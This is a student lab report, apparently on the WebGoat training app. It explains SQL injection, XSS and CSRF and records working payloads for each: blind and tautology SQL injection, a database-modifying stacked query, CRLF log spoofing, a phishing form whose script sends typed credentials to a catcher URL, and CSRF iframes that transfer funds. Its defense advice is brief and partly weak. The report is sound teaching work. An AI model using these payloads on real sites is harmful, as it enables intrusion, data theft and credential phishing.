20145201李子璇 《网络对抗》 Web安全基础实践

1.实验后回答问题

（1）SQL注入攻击原理，如何防御

• 原理：通过构建特殊的输入作为参数传入web应用程序。即把SQL命令注入到Web表单的输入域或页面请求的查询字符串，和之前已经设定好的查询语句构成关联，欺骗服务器执行恶意的SQL命令，从而达到控制读取网页等目的。

• 防御:对用户输入的参数进行过滤，对输入数据的合法性进行判断（不允许输入特殊字符，如：' 等）。

（2）XSS攻击的原理，如何防御

• 原理：跨站脚本攻击。构造带有攻击代码的URL，将URL进行包装，被攻击者以为是正常的网页，点击，攻击代码随着html返回到被攻击者浏览器并执行，用户就中招了。
• 防御：将一些不合理的标签(eg：< > % /)进行过滤；限制用户输入的字符，例如：只允许输入a-z A-Z 0-9

（3）CSRF攻击原理，如何防御

• 原理：和xss类似，但是CSRF不用“骗取”用户信息，他是利用用户已经登录之前那个网站存储下来的cookie，以中招用户的身份完成一系列非法的操作。
• 防御：最根本的就是解决cookie问题呗，可以增加验证码，用户每次提交表单都要输入验证码才行！

2.实验总结与体会

知道了为什么注册时不让用特殊符号。以后设计相关网页时也要注意，一定要对用户输入数据的合法性进行判断。太可怕了，一不小心就被攻击...

3.实践过程记录

完成列表

SQL

Blind Numeric SQL Injection（数字型盲注入）

可以输入一个帐号，检测其是否合法。用返回信息（真或假）测试检查数据库中其它条目信息。 

目标是找到 1111222233334444 的pin数值（整型）。

比如我查了101账号是合法的

• 然后是寻找pin数值
  
  查找PIN 数值是否大于10000。 
  
  101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 ); 
  
  页面显示值是不大于10000的。
• 一直调整数值，来缩小判断范围，最终得出pin值的大小。
  
  最后输入的是： 
  
  101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364 ); 
  
  
  
  发现合法 那么直接在框中输入2364即可。
  
  

字符串型盲注入（Blind String SQL Injection）

输入一个帐号，检测帐号是否合法。用该返回信息检查数据库中其它条目信息。 

目标是找到字段4321432143214321中pin 的数值（值为字符串）

• 和上一个类似。
  
  输入查询语句：
  
  101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'C' );
• 这句使用了SUBSTRING 方法，获得pin字符数值的第一个字母，判断它是否比字母“C”小。
  
  SUBSTRING 的语法是：SUBSTRING(STRING,START,LENGTH)
• 依此类推，最终答案Jill，提交：
  
  

Log Spoofing（日志欺骗）

使用户名admin ，显示“成功登录”。  

操作方法（Solutions）

• 先试一下我的学号作为用户名，发现用户名后面的信息会在同一行显示。那么之后可以考虑用回车来进行sql注入。
  
  

• 在用户名中输入 %0d%0aLogin Succeeded for username: admin （注：%0d是回车 %0a是换行符）
  
  就可以实现了

String SQL Injection（字符串型注入）

• 目标是将所有信用卡信息一起显示出来。

• 先尝试输一下
  
  

• 注入字符是' or 1=1 -- 原理是用'将字符和之前的截断，后面用永真式1=1，最后是‘--’把之后的内容注释掉
  
  

Database Backdoors（数据库后门）

• 可以先输入101，看一下得到的信息，可以发现没有验证，可以进行sql注入。
• 101; update employee set salary=10000
  
  把编号为101的人工资修改成10000（这步我没截图- -后来发现回不去了...）
• 使用语句，添加后门，把邮箱全改为我学号：
  
  

xss

Stored XSS Attacks（保存型XSS攻击）

• 攻击者写的Xss代码将被直接保存在服务器上，之后所有访问的用户都会中招。

直接在massage框中输入javascrip脚本，即可

<script>alert("xxx")</script>

提交之后，如果再次点击刚刚发布的帖子，就会出现弹框。

Reflected XSS Attacks（反射型XSS）

和上一个类似，在下面文本框中输入 http://www.targetserver.com/search.asp?input= ，服务端会跳转到对应的错误页，如下：

这样www.targetserve.com里的恶意js会被执行。

Phishing with XSS （跨站脚本钓鱼攻击）

• search框编写前端代码并在输入框中注入这段前端代码

<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;background-color:green;"></div>
<div style="float:left;height:100px;width:50%;background-color:red;"></div>
</div>
<div style="background-color:blue;height:200px;clear:both;"></div>

</div></div>
</form>
  <script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("20145201 Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>

• 按要求输入username password 成功截获
  
  

CSRF

Cross Site Request Forgery (CSRF)

• message里输入这其中，286是网页的scr，900是网页的menu，999999转钱数额
  
  

• 列表中出现刚刚提交的数据
  
  

• 点击代码执行
  
  

CSRF Prompt By-Pass

• 通过邮件的方式进行恶意请求，需要两个iframe模块，如下：

<iframe src="attack?Screen=270&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=270&menu=900&transferFunds=CONFIRM"> </iframe>

•